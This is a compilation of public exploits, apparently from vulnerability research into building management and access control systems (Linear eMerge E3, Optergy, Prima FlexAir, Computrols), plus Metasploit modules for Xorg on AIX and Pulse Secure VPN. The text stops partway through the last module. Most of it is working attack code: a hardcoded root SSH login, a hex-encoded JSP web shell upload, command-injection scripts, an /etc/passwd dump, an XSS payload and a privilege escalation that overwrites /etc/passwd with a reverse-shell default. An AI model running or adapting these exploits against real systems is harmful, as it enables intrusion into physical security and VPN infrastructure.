Computrols CBAS-Web Username Enumeration

Affected versions: 19.0.0 and below
CVE: CVE-2019-10848
Advisory: https://applied-risk.com/resources/ar-2019-009
Paper: https://applied-risk.com/resources/i-own-your-building-management-system

Discovered by Gjoko 'LiquidWorm' Krstic


Testing for non-valid user:

POST /cbas/index.php?m=auth&a=login HTTP/1.1

username=randomuser&password=&challenge=60753c1b5e449de80e21472b5911594d&response=e16371917371b8b70529737813840c62


Response for non-valid user:

<!-- Failed login comments appear here -->
<p class="alert-error">randomuser</p>

========================================================================

Testing for valid user:

POST /cbas/index.php?m=auth&a=login HTTP/1.1

username=admin&password=&challenge=6e4344e7ac62520dba82d7f20ccbd422&response=e09aab669572a8e4576206d5c14befc5s


Response for valid user:

<!-- Failed login comments appear here -->
<p class="alert-error">Invalid username/password combination.  Please try again!</p>

#!/usr/bin/env python
#
# Nortek Linear eMerge E3 Access Controller SSH/FTP Remote Root
# Affected version: <=1.00-06
# CVE: CVE-2019-7261, CVE-2019-7265
# Advisory: https://applied-risk.com/resources/ar-2019-005
# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
#
# by Gjoko 'LiquidWorm' Krstic
#
# ====
# python lineare3_sshroot.py 192.168.1.2
# [+] Connecting to 192.168.1.2 on port 22: Done
# [!] Only Linux is supported for ASLR checks.
# [*] root@192.168.1.2:
#     Distro    Unknown Unknown
#     OS:       Unknown
#     Arch:     Unknown
#     Version:  0.0.0
#     ASLR:     Disabled
#     Note:     Susceptible to ASLR ulimit trick (CVE-2016-3672)
# [+] Opening new channel: 'shell': Done
# [*] Switching to interactive mode
# Last login: Fri Nov  1 04:21:44 2019 from 192.168.2.17
# root@imx6slevk:~# id
# uid=0(root) gid=0(root) groups=0(root)
# root@imx6slevk:~# pwd
# /home/root
# root@imx6slevk:~# exit
# logout
# [*] Got EOF while reading in interactive
# [*] Closed SSH channel with 192.168.1.2
# ====

from pwn import *

if len(sys.argv) < 2:
    print 'Usage: ./e3.py <ip>\n'
    sys.exit()

ip = sys.argv[1]
rshell = ssh('root', ip, password='davestyle', port=22)
rshell.interactive()

Open Redirect in Optergy Proton/Enterprise BMS
Firmware version: <=2.3.0a
CVE: CVE-2019-7275
Advisory: https://applied-risk.com/resources/ar-2019-008
Paper: https://applied-risk.com/resources/i-own-your-building-management-system

by Gjoko 'LiquidWorm' Krstic

GET /updating.jsp?url=https://segfault.mk HTTP/1.1

#!/usr/bin/env python
# -*- coding: utf8 -*-
#
# Authenticated File Upload in Optergy gaining Remote Root Code Execution
# Firmware version: <=2.3.0a
# CVE: CVE-2019-7274
# Advisory: https://applied-risk.com/resources/ar-2019-008
# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
#
# Discovered by Gjoko 'LiquidWorm' Krstic
#
##########################################################################
#
# lqwrm@metalgear:~/stuff/optergy$ python optergy_rfm.py
# [+] Usage: optergy_rfm.py http://IP
# [+] Example: optergy_rfm.py http://10.0.0.17
#
# lqwrm@metalgear:~/stuff/optergy$ python optergy_rfm.py http://192.168.232.19
# Enter username: podroom
# Enter password: podroom
#
# Welcome to Optergy HTTP Shell!
# You can navigate to: http://192.168.232.19/images/jox.jsp
# Or you can continue using this 'shell'.
# Type 'exit' for exit.
#
# root@192.168.232.19:~# id
# uid=1000(optergy) gid=1000(optergy) groups=1000(optergy),4(adm)
# root@192.168.232.19:~# sudo id
# uid=0(root) gid=0(root) groups=0(root)
# root@192.168.232.19:~# rm /usr/local/tomcat/webapps/ROOT/images/jox.jsp
#
# root@192.168.232.19:~# exit
# Have a nice day!
#
##########################################################################

import requests
import sys,os,time,re

piton = os.path.basename(sys.argv[0])

if len(sys.argv) < 2:
    print "[+] Usage: " + piton + " http://IP"
    print "[+] Example: " + piton + " http://10.0.0.17\n"
    sys.exit()

the_user = raw_input("Enter username: ")
the_pass = raw_input("Enter password: ")
the_host = sys.argv[1]
odi = requests.Session()

the_url = the_host + "/ajax/AjaxLogin.html?login"
the_headers = {"Accept"           : "*/*",
"X-Requested-With" : "XMLHttpRequest",
"User-Agent"       : "Noproblem/16.0",
"Content-Type"     : "application/x-www-form-urlencoded",
"Accept-Encoding"  : "gzip, deflate",
"Accept-Language"  : "en-US,en;q=0.9"}

the_data = {"username" : the_user,
"password" : the_pass,
"token"    : ''}

odi.post(the_url, headers = the_headers, data = the_data)

the_upl = ("\x2f\x61\x6a\x61\x78\x2f\x46\x69\x6c\x65\x55\x70\x6c\x6f\x61\x64"
"\x65\x72\x2e\x68\x74\x6d\x6c\x3f\x69\x64\x54\x6f\x55\x73\x65\x3d"
"\x61\x74\x74\x61\x63\x68\x6d\x65\x6e\x74\x2d\x31\x35\x34\x36\x30"
"\x30\x32\x33\x36\x39\x39\x33\x39\x26\x64\x65\x63\x6f\x6d\x70\x72"
"\x65\x73\x73\x3d\x66\x61\x6c\x73\x65\x26\x6f\x75\x74\x70\x75\x74"
"\x4c\x6f\x63\x61\x74\x69\x6f\x6e\x3d\x25\x32\x46\x75\x73\x72\x25"
"\x32\x46\x6c\x6f\x63\x61\x6c\x25\x32\x46\x74\x6f\x6d\x63\x61\x74"
"\x25\x32\x46\x77\x65\x62\x61\x70\x70\x73\x25\x32\x46\x52\x4f\x4f"
"\x54\x25\x32\x46\x69\x6d\x61\x67\x65\x73\x25\x32\x46\x26\x66\x69"
"\x6c\x65\x4e\x61\x6d\x65\x3d\x6a\x6f\x78\x2e\x6a\x73\x70")######"

the_url = the_host + the_upl
the_headers = {"Cache-Control"   : "max-age=0",
"Content-Type"    : "multipart/form-data; boundary=----WebKitFormBoundarysrMvKmQPYUODSWBl",
"User-Agent"      : "Noproblem/16.0",
"Accept"          : "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8",
"Accept-Encoding" : "gzip, deflate",
"Accept-Language" : "en-US,en;q=0.9"}

the_data = ("\x2d\x2d\x2d\x2d\x2d\x2d\x57\x65\x62\x4b\x69\x74\x46\x6f\x72\x6d"
"\x42\x6f\x75\x6e\x64\x61\x72\x79\x73\x72\x4d\x76\x4b\x6d\x51\x50"
"\x59\x55\x4f\x44\x53\x57\x42\x6c\x0d\x0a\x43\x6f\x6e\x74\x65\x6e"
"\x74\x2d\x44\x69\x73\x70\x6f\x73\x69\x74\x69\x6f\x6e\x3a\x20\x66"
"\x6f\x72\x6d\x2d\x64\x61\x74\x61\x3b\x20\x6e\x61\x6d\x65\x3d\x22"
"\x61\x74\x74\x61\x63\x68\x6d\x65\x6e\x74\x2d\x31\x35\x34\x36\x30"
"\x30\x32\x33\x36\x39\x39\x33\x39\x22\x3b\x20\x66\x69\x6c\x65\x6e"
"\x61\x6d\x65\x3d\x22\x6a\x6f\x78\x2e\x6a\x73\x70\x22\x0d\x0a\x43"
"\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x3a\x20\x61\x70\x70"
"\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x6f\x63\x74\x65\x74\x2d\x73"
"\x74\x72\x65\x61\x6d\x0d\x0a\x0d\x0a\x3c\x25\x40\x20\x70\x61\x67"
"\x65\x20\x69\x6d\x70\x6f\x72\x74\x3d\x22\x6a\x61\x76\x61\x2e\x75"
"\x74\x69\x6c\x2e\x2a\x2c\x6a\x61\x76\x61\x2e\x69\x6f\x2e\x2a\x22"
"\x25\x3e\x0a\x3c\x48\x54\x4d\x4c\x3e\x3c\x42\x4f\x44\x59\x3e\x0a"
"\x3c\x46\x4f\x52\x4d\x20\x4d\x45\x54\x48\x4f\x44\x3d\x22\x47\x45"
"\x54\x22\x20\x4e\x41\x4d\x45\x3d\x22\x6d\x79\x66\x6f\x72\x6d\x22"
"\x20\x41\x43\x54\x49\x4f\x4e\x3d\x22\x22\x3e\x0a\x3c\x49\x4e\x50"
"\x55\x54\x20\x54\x59\x50\x45\x3d\x22\x74\x65\x78\x74\x22\x20\x4e"
"\x41\x4d\x45\x3d\x22\x63\x6d\x64\x22\x3e\x0a\x3c\x49\x4e\x50\x55"
"\x54\x20\x54\x59\x50\x45\x3d\x22\x73\x75\x62\x6d\x69\x74\x22\x20"
"\x56\x41\x4c\x55\x45\x3d\x22\x53\x65\x6e\x64\x22\x3e\x0a\x3c\x2f"
"\x46\x4f\x52\x4d\x3e\x0a\x3c\x70\x72\x65\x3e\x0a\x3c\x25\x0a\x69"
"\x66\x20\x28\x72\x65\x71\x75\x65\x73\x74\x2e\x67\x65\x74\x50\x61"
"\x72\x61\x6d\x65\x74\x65\x72\x28\x22\x63\x6d\x64\x22\x29\x20\x21"
"\x3d\x20\x6e\x75\x6c\x6c\x29\x20\x7b\x0a\x20\x20\x20\x20\x20\x20"
"\x20\x20\x6f\x75\x74\x2e\x70\x72\x69\x6e\x74\x6c\x6e\x28\x22\x43"
"\x6f\x6d\x6d\x61\x6e\x64\x3a\x20\x22\x20\x2b\x20\x72\x65\x71\x75"
"\x65\x73\x74\x2e\x67\x65\x74\x50\x61\x72\x61\x6d\x65\x74\x65\x72"
"\x28\x22\x63\x6d\x64\x22\x29\x20\x2b\x20\x22\x3c\x42\x52\x3e\x22"
"\x29\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x50\x72\x6f\x63\x65"
"\x73\x73\x20\x70\x20\x3d\x20\x52\x75\x6e\x74\x69\x6d\x65\x2e\x67"
"\x65\x74\x52\x75\x6e\x74\x69\x6d\x65\x28\x29\x2e\x65\x78\x65\x63"
"\x28\x72\x65\x71\x75\x65\x73\x74\x2e\x67\x65\x74\x50\x61\x72\x61"
"\x6d\x65\x74\x65\x72\x28\x22\x63\x6d\x64\x22\x29\x29\x3b\x0a\x20"
"\x20\x20\x20\x20\x20\x20\x20\x4f\x75\x74\x70\x75\x74\x53\x74\x72"
"\x65\x61\x6d\x20\x6f\x73\x20\x3d\x20\x70\x2e\x67\x65\x74\x4f\x75"
"\x74\x70\x75\x74\x53\x74\x72\x65\x61\x6d\x28\x29\x3b\x0a\x20\x20"
"\x20\x20\x20\x20\x20\x20\x49\x6e\x70\x75\x74\x53\x74\x72\x65\x61"
"\x6d\x20\x69\x6e\x20\x3d\x20\x70\x2e\x67\x65\x74\x49\x6e\x70\x75"
"\x74\x53\x74\x72\x65\x61\x6d\x28\x29\x3b\x0a\x20\x20\x20\x20\x20"
"\x20\x20\x20\x44\x61\x74\x61\x49\x6e\x70\x75\x74\x53\x74\x72\x65"
"\x61\x6d\x20\x64\x69\x73\x20\x3d\x20\x6e\x65\x77\x20\x44\x61\x74"
"\x61\x49\x6e\x70\x75\x74\x53\x74\x72\x65\x61\x6d\x28\x69\x6e\x29"
"\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x53\x74\x72\x69\x6e\x67"
"\x20\x64\x69\x73\x72\x20\x3d\x20\x64\x69\x73\x2e\x72\x65\x61\x64"
"\x4c\x69\x6e\x65\x28\x29\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20"
"\x77\x68\x69\x6c\x65\x20\x28\x20\x64\x69\x73\x72\x20\x21\x3d\x20"
"\x6e\x75\x6c\x6c\x20\x29\x20\x7b\x0a\x20\x20\x20\x20\x20\x20\x20"
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6f\x75\x74\x2e\x70\x72\x69"
"\x6e\x74\x6c\x6e\x28\x64\x69\x73\x72\x29\x3b\x20\x0a\x20\x20\x20"
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x64\x69\x73"
"\x72\x20\x3d\x20\x64\x69\x73\x2e\x72\x65\x61\x64\x4c\x69\x6e\x65"
"\x28\x29\x3b\x20\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
"\x20\x20\x20\x20\x20\x7d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x7d"
"\x0a\x25\x3e\x0a\x3c\x2f\x70\x72\x65\x3e\x0a\x3c\x2f\x42\x4f\x44"
"\x59\x3e\x3c\x2f\x48\x54\x4d\x4c\x3e\x0a\x0a\x0a\x0d\x0a\x2d\x2d"
"\x2d\x2d\x2d\x2d\x57\x65\x62\x4b\x69\x74\x46\x6f\x72\x6d\x42\x6f"
"\x75\x6e\x64\x61\x72\x79\x73\x72\x4d\x76\x4b\x6d\x51\x50\x59\x55"
"\x4f\x44\x53\x57\x42\x6c\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d"
"\x44\x69\x73\x70\x6f\x73\x69\x74\x69\x6f\x6e\x3a\x20\x66\x6f\x72"
"\x6d\x2d\x64\x61\x74\x61\x3b\x20\x6e\x61\x6d\x65\x3d\x22\x75\x70"
"\x6c\x6f\x61\x64\x22\x0d\x0a\x0d\x0a\x55\x70\x6c\x6f\x61\x64\x0d"
"\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x57\x65\x62\x4b\x69\x74\x46\x6f\x72"
"\x6d\x42\x6f\x75\x6e\x64\x61\x72\x79\x73\x72\x4d\x76\x4b\x6d\x51"
"\x50\x59\x55\x4f\x44\x53\x57\x42\x6c\x2d\x2d\x0d\x0a")##########"

odi.post(the_url, headers = the_headers, data = the_data)

print "\nWelcome to Optergy HTTP Shell!"
print "You can navigate to: " + the_host + "/images/jox.jsp"
print "Or you can continue using this 'shell'."
print "Type 'exit' for exit.\n"

while True:
  try:
    cmd = raw_input("root@" + the_host[7:] + ":~# ")
    if cmd.strip() == "exit":
      print "Have a nice day!"
      break
    paramz = {"cmd" : cmd} # sudo cmd
    shell = requests.get(url = the_host + "/images/jox.jsp", params = paramz)
    regex = re.search(r"BR>(.*?)</pre>", shell.text, flags = re.S)
    print regex.group(1).strip()
  except Exception:
    break

sys.exit()

#!/bin/bash
#
# Command injection with root privileges in FlexAir Access Control (Prima Systems)
# Firmware version: <= 2.3.38
# CVE: CVE-2019-7669
# Advisory: https://applied-risk.com/resources/ar-2019-007
# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
#
# Discovered by Sipke Mellema
# Updated: 14.01.2019
#
##########################################################################
#
# $ ./Nova2.3.38_cmd.sh 192.168.13.37 "id"
# Executing: id
# Output:
# uid=0(root) gid=0(root) groups=0(root),10(wheel)
# Removing temporary file..
# Done
#
##########################################################################
# Output file on the server
OUTPUT_FILE="/www/pages/app/images/logos/output.txt"
# Command to execute
CMD="$2"
# IP address
IP="$1"
# Change HTTP to HTTPS if required
HOST="http://${IP}"
# Add output file
CMD_FULL="${CMD}>${OUTPUT_FILE}"
# Command injection payload. Be careful with single quotes!
PAYLOAD="<requests><request name='LoginUser'><param name='UsrName' value='test'/><param name='UsrEMail' value='test@test.com'/><param name='GoogleAccessToken' value='test;${CMD_FULL}'/></request></requests>"

# Perform exploit
echo "Executing: ${CMD}"
curl --silent --output /dev/null -X POST -d "${PAYLOAD}""${HOST}/bin/sysfcgi.fx"
# Get output
echo "Output:"
curl -s "${HOST}/app/images/logos/output.txt"
# Remove temp file
echo "Removing temporary file.."
PAYLOAD="<requests><request name='LoginUser'><param name='UsrName' value='test'/><param name='UsrEMail' value='test@test.com'/><param name='GoogleAccessToken' value='test;rm /www/pages/app/images/logos/output.txt'/></request></requests>"
curl --silent --output /dev/null -X POST -d "${PAYLOAD}""${HOST}/bin/sysfcgi.fx"
echo "Done"

#!/usr/bin/env python
#
# Authenticated Remote Root Exploit for Prima FlexAir Access Control 2.3.38
# via Command Injection in SetNTPServer request, Server parameter.
#
# CVE: CVE-2019-7670
# Advisory: https://applied-risk.com/resources/ar-2019-007
# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
#
# By Gjoko 'LiquidWorm' Krstic
#
# 18.01.2019
#
############################################################################
#
# $ python ntpcmdinj.py
# [+] Usage: python ntpcmdinj.py [Target] [Session-ID] [Command]
# [+] Example: python ntpcmdinj.py http://10.0.251.17:8080 10167847 whoami
#
# $ python ntpcmdinj.py http://192.168.230.17:8080 11339284 "uname -a"
# Linux Alpha 4.4.16 #1 Mon Aug 29 13:29:40 CEST 2016 armv7l GNU/Linux
#
# $ python ntpcmdinj.py http://192.168.230.17:8080 11339284 id
# uid=0(root) gid=0(root) groups=0(root),10(wheel)
#
############################################################################
#

import requests
import sys#####

if len(sys.argv) < 4:
    print '[+] Usage: python ntpcmdinj.py [Target] [Session-ID] [Command]'
    print '[+] Example: python ntpcmdinj.py http://10.0.0.17:8080 10167847 whoami\n'
    sys.exit()

host = sys.argv[1]
sessionid = sys.argv[2]
commando = sys.argv[3]

url = host+"/bin/sysfcgi.fx"

headers = {"Session-ID"       : sessionid, # Muy importante!
"User-Agent"       : "Dj/Ole",
"Content-Type"     : "application/x-www-form-urlencoded; charset=UTF-8",
"Accept"           : "text/html, */*; q=0.01",
"Session-Pc"       : "2",
"X-Requested-With" : "XMLHttpRequest",
"Accept-Encoding"  : "gzip, deflate",
"Accept-Language"  : "en-US,en;q=0.9"}

payload = ("<requests><request name=\"SetNTPServer\">"
"<param name=\"Server\" value=\"2.europe.p"
"ool.ntp.org;"+commando+">/www/pages/ap"
"p/images/logos/stage.txt|\"/></request></"
"requests>")

requests.post(url, headers=headers, data=payload)

e = requests.get(host+"/app/images/logos/stage.txt")
print e.text

#
# Nortek Linear eMerge E3 Unauthenticated Remote Root Code Execution (Metasploit)
# by Gjoko 'LiquidWorm' Krstic
# Affected version: <=1.00-06
# Advisory: https://applied-risk.com/resources/ar-2019-005
# Tested on: GNU/Linux 3.14.54 (ARMv7 rev 10), Lighttpd 1.4.40, PHP/5.6.23
#

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
'Name'           => 'Linear eMerge E3 Access Controller Command Injection',
'Description'    => %q{
          This module exploits a command injection vulnerability in the Linear eMerge
          E3 Access Controller. The issue is triggered by an unsanitized exec() PHP
          function allowing arbitrary command execution with root privileges.
        },
'License'        => MSF_LICENSE,
'Author'         =>
          [
'Gjoko Krstic <gjoko@applied-risk.com> ' # Discovery, Exploit, MSF Module
          ],
'References'     =>
          [
            [ 'URL', 'https://applied-risk.com/labs/advisories' ],
            [ 'URL', 'https://www.nortekcontrol.com' ],
            [ 'CVE', '2019-7256']
          ],
'Privileged'     => false,
'Payload'        =>
          {
'DisableNops' => true,
          },
'Platform'       => [ 'unix' ],
'Arch'           => ARCH_CMD,
'Targets'        => [ ['Linear eMerge E3', { }], ],
'DisclosureDate' => "Oct 29 2019",
'DefaultTarget'  => 0
      )
    )
  end

  def check
    res = send_request_cgi({
'uri'        => normalize_uri(target_uri.path.to_s, "card_scan_decoder.php"),
'vars_get'   =>
        {
'No'      => '251',
'door'    => '1337'
        }
    })
    if res.code == 200 and res.to_s =~ /PHP\/5.6.23/
      return Exploit::CheckCode::Vulnerable
    end
    return Exploit::CheckCode::Safe
  end

  def http_send_command(cmd)
    uri = normalize_uri(target_uri.path.to_s, "card_scan_decoder.php")
    res = send_request_cgi({
'method'   => 'GET',
'uri'      => uri,
'vars_get' =>
        {
'No'   => '251',
'door' => "`"+cmd+"`"
        }
    })
    unless res
      fail_with(Failure::Unknown, 'Exploit failed!')
    end
    res
  end

  def exploit
    http_send_command(payload.encoded)
    print_status("Sending #{payload.encoded.length} byte payload...")
  end
end

Prima Access Control 2.3.35 Authenticated Python Script Upload Root RCE

CVE: CVE-2019-9189
Advisory: https://applied-risk.com/resources/ar-2019-007
Paper: https://applied-risk.com/resources/i-own-your-building-management-system

Discovered by Gjoko 'LiquidWorm' Krstic

---

POST /bin/sysfcgi.fx HTTP/1.1
Host: 192.168.13.37
Connection: keep-alive
Content-Length: 572
Origin: https://192.168.13.37
Session-ID: 5682699
User-Agent: Mozi-Mozi/44.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: text/html, */*; q=0.01
Session-Pc: 2
X-Requested-With: XMLHttpRequest
Referer: https://192.168.13.37/app/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: G_ENABLED_IDPS=google

<requests><request name="PythonScriptUpload"><param name="DestinationHwID" value="1"/><param name="FileName" value="test_python.py"/><param name="Content" value="#!/usr/bin/python&#xA;#&#xA;# test script&#xA;#&#xA;&#xA;import sys,os&#xA;&#xA;with open("/etc/passwd") as f:&#xA;    with open("/www/pages/app/images/logos/testingus2.txt", "w") as f1:&#xA;        for line in f:&#xA;            f1.write(line)&#xA;&#xA;&#xA;os.system("id;uname -a >> /www/pages/app/images/logos/testingus2.txt")"/></request></requests>

Result:

$ curl https://192.168.13.37/app/images/logos/testingus2.txt
root:x:0:0:root:/home/root:/bin/sh
daemon:x:1:1:daemon:/usr/sbin:/bin/false
bin:x:2:2:bin:/bin:/bin/false
sys:x:3:3:sys:/dev:/bin/false
sync:x:4:100:sync:/bin:/bin/sync
mail:x:8:8:mail:/var/spool/mail:/bin/false
www-data:x:33:33:www-data:/var/www:/bin/false
operator:x:37:37:Operator:/var:/bin/false
nobody:x:99:99:nobody:/home:/bin/false
python:x:1000:1000:python:/home/python:/bin/false
admin:x:1001:1001:Linux User,,,:/home/admin:/bin/sh
uid=0(root) gid=0(root) groups=0(root),10(wheel)
Linux DemoMaster214 4.4.16 #1 Mon Aug 29 13:29:40 CEST 2016 armv7l GNU/Linux

Prima Access Control 2.3.35 Authenticated Stored XSS

CVE: CVE-2019-7671
Advisory: https://applied-risk.com/resources/ar-2019-007

Discovered by Gjoko 'LiquidWorm' Krstic


POST /bin/sysfcgi.fx HTTP/1.1
Host: 192.168.13.37
Connection: keep-alive
Content-Length: 265
Origin: https://192.168.13.37
Session-ID: 10127047
User-Agent: Mozi-Mozi/44.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: text/html, */*; q=0.01
Session-Pc: 2
X-Requested-With: XMLHttpRequest
Referer: https://192.168.13.37/app/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

<requests><request name="CreateDevice"><param name="HwType" value="1000"/><param name="HwParentID" value="0"/><param name="HwLogicParentID" value="0"/><param name="HwName" value=""><script>alert("XSSz")</script>"/></request></requests>

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = GreatRanking

  include Msf::Post::File
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
'Name'           => 'Xorg X11 Server Local Privilege Escalation',
'Description'    => %q(
        WARNING: Successful execution of this module results in /etc/passwd being overwritten.

        This module is a port of the OpenBSD X11 Xorg exploit to run on AIX.

        A permission check flaw exists for -modulepath and -logfile options when
        starting Xorg.  This allows unprivileged users that can start the server
        the ability to elevate privileges and run arbitrary code under root
        privileges.

        This module has been tested with AIX 7.1 and 7.2, and should also work with 6.1.
        Due to permission restrictions of the crontab in AIX, this module does not use cron,
        and instead overwrites /etc/passwd in order to create a new user with root privileges.
        All currently logged in users need to be included when /etc/passwd is overwritten,
        else AIX will throw 'Cannot get "LOGNAME" variable' when attempting to change user.
        The Xorg '-fp' parameter used in the OpenBSD exploit does not work on AIX,
        and is replaced by '-config', in conjuction with ANSI-C quotes to inject newlines when
        overwriting /etc/passwd.
      ),
'Author'         =>
        [
'Narendra Shinde', # Discovery and original FreeBSD exploit
'Zack Flack <dzflack[at]gmail.com>' # Metasploit module and original AIX exploit
        ],
'License'        => MSF_LICENSE,
'DisclosureDate' => 'Oct 25 2018',
'Notes'         =>
        {
'SideEffects' => [ CONFIG_CHANGES ]
        },
'References'     =>
        [
          ['CVE', '2018-14665'],
          ['URL', 'https://www.securepatterns.com/2018/10/cve-2018-14665-xorg-x-server.html'],
          ['URL', 'https://aix.software.ibm.com/aix/efixes/security/xorg_advisory3.asc'],
          ['URL', 'https://github.com/dzflack/exploits/blob/master/aix/aixxorg.pl'],
          ['EDB', '45938']
        ],
'Platform'       => ['unix'],
'Arch'           => [ARCH_CMD],
'SessionTypes'   => ['shell'],
'Payload'        => {
'Compat' => {
'PayloadType'  => 'cmd',
'RequiredCmd'  => 'perl'
        }
      },
'DefaultOptions' => {
'Payload' => 'cmd/unix/reverse_perl'
      },
'Targets'        =>
        [
          ['IBM AIX Version 6.1', {}],
          ['IBM AIX Version 7.1', {}],
          ['IBM AIX Version 7.2', {}]
        ],
'DefaultTarget'  => 1))

    register_options(
      [
        OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
      ]
    )
  end

  def check
    xorg_path = cmd_exec('command -v Xorg')
    if !xorg_path.include?('Xorg')
      print_error('Could not find Xorg executable')
      return Exploit::CheckCode::Safe
    end

    ksh93_path = cmd_exec('command -v ksh93')
    if !ksh93_path.include?('ksh')
      print_error('Could not find Ksh93 executable')
      return Exploit::CheckCode::Safe
    end

    if !xorg_vulnerable?
      print_error('Xorg version is not vulnerable')
      return Exploit::CheckCode::Safe
    end

    return Exploit::CheckCode::Appears
  end

  def exploit
    status = check

    if status == Exploit::CheckCode::Safe
      fail_with(Failure::NotVulnerable, '')
    end

    if !writable?(datastore['WritableDir'])
      fail_with(Failure::BadConfig, "#{datastore['WritableDir']} is not writable")
    end

    xorg_path = cmd_exec('command -v Xorg')
    ksh93_path = cmd_exec('command -v ksh93')

    xorg_payload = generate_xorg_payload(xorg_path, ksh93_path, datastore['WritableDir'])
    xorg_script_path = "#{datastore['WritableDir']}/wow.ksh"
    upload_and_chmodx(xorg_script_path, xorg_payload)

    passwd_backup = "#{datastore['WritableDir']}/passwd.backup"
    print_status("Backing up /etc/passwd to #{passwd_backup}")
    cmd_exec("cp /etc/passwd #{passwd_backup}")
    register_file_for_cleanup(passwd_backup)

    print_status("Executing #{xorg_script_path}")
    cmd_exec(xorg_script_path)
    print_status('Checking if we are root')

    if root?
      shell_payload = %(#!#{ksh93_path}
#{payload.encoded}
)
      shell_script_path = "#{datastore['WritableDir']}/wowee.ksh"
      upload_and_chmodx(shell_script_path, shell_payload)

      print_status('Executing shell payload')
      cmd_exec("#{ksh93_path} -c \"echo #{shell_script_path} | su - wow &\"")

      print_status('Restoring original /etc/passwd')
      cmd_exec("su - wow -c \"cp #{passwd_backup} /etc/passwd\"")
    else
      fail_with(Failure::PayloadFailed, '')
    end
  end

  def generate_xorg_payload(xorg_path, ksh93_path, writabledir)
    passwd_file = read_file('/etc/passwd')
    passwd_array = passwd_file.split("\n")

    print_status('Retrieving currently logged in users')
    users = cmd_exec('who | cut -d\' \' -f1 | sort | uniq')
    users << "\n"
    users_array = users.split("\n")

    logged_in_users = ''
    if !users_array.empty?
      users_array.each do |user|
        user << ':'
        passwd_array.each do |line|
          if line.index(user) == 0
            logged_in_users << '\n'
            logged_in_users << line
          end
        end
      end
    end

    passwd_data = "$'#{logged_in_users}\\nwow::0:0::/:/usr/bin/ksh\\n#'"

    subdir_count = writabledir.count('/')
    relative_passwd = '../' * subdir_count + '../../etc/passwd'

    return %(#!#{ksh93_path}
    #{xorg_path} -config #{passwd_data} -logfile #{relative_passwd} :1 > /dev/null 2>&1
)
  end

  def xorg_vulnerable?
    version = cmd_exec('lslpp -L | grep -i X11.base.rte | awk \'{ print $2 }\'')
    print_status("Xorg version is #{version}")
    semantic_version = Gem::Version.new(version)

    vulnerable_versions = [
      ['6.1.9.0', '6.1.9.100'],
      ['7.1.4.0', '7.1.4.30'],
      ['7.1.5.0', '7.1.5.31'],
      ['7.2.0.0', '7.2.0.1'],
      ['7.2.1.0', '7.2.1.0'],
      ['7.2.2.0', '7.2.2.0'],
      ['7.2.3.0', '7.2.3.15']
    ]

    vulnerable_versions.each do |version_pair|
      if semantic_version >= Gem::Version.new(version_pair[0]) &&
         semantic_version <= Gem::Version.new(version_pair[1])
        return true
      end
    end

    return false
  end

  def root?
    id_output = cmd_exec('su - wow -c "id"')

    if id_output.include?('euid=0') || id_output.include?('uid=0')
      print_good('Got root!')
      return true
    end

    print_error('Not root')
    false
  end

  def upload_and_chmodx(path, data)
    print_status("Writing to #{path}")
    rm_f(path)
    write_file(path, data)
    cmd_exec("chmod 0555 '#{path}'")

    register_file_for_cleanup(path)
  end
end

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote

  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
'Name'               => 'Pulse Secure VPN Arbitrary Command Execution',
'Description'        => %q{
        This module exploits a post-auth command injection in the Pulse Secure
        VPN server to execute commands as root. The env(1) command is used to
        bypass application whitelisting and run arbitrary commands.

        Please see related module auxiliary/gather/pulse_secure_file_disclosure
        for a pre-auth file read that is able to obtain plaintext and hashed
        credentials, plus session IDs that may be used with this exploit.

        A valid administrator session ID is required in lieu of untested SSRF.
      },
'Author'             => [
'Orange Tsai', # Discovery (@orange_8361)
'Meh Chang',   # Discovery (@mehqq_)
'wvu'          # Module
      ],
'References'         => [
        ['CVE', '2019-11539'],
        ['URL', 'https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/'],
        ['URL', 'https://blog.orange.tw/2019/09/attacking-ssl-vpn-part-3-golden-pulse-secure-rce-chain.html'],
        ['URL', 'https://hackerone.com/reports/591295']
      ],
'DisclosureDate'     => '2019-04-24', # Public disclosure
'License'            => MSF_LICENSE,
'Platform'           => ['unix', 'linux'],
'Arch'               => [ARCH_CMD, ARCH_X86, ARCH_X64],
'Privileged'         => true,
'Targets'            => [
        ['Unix In-Memory',
'Platform'       => 'unix',
'Arch'           => ARCH_CMD,
'Type'           => :unix_memory,
'Payload'        => {
'BadChars'     => %Q(&*(){}[]`;|?\n~<>"'),
'Encoder'      => 'generic/none' # Force manual badchar analysis
          },
'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/generic'}
        ],
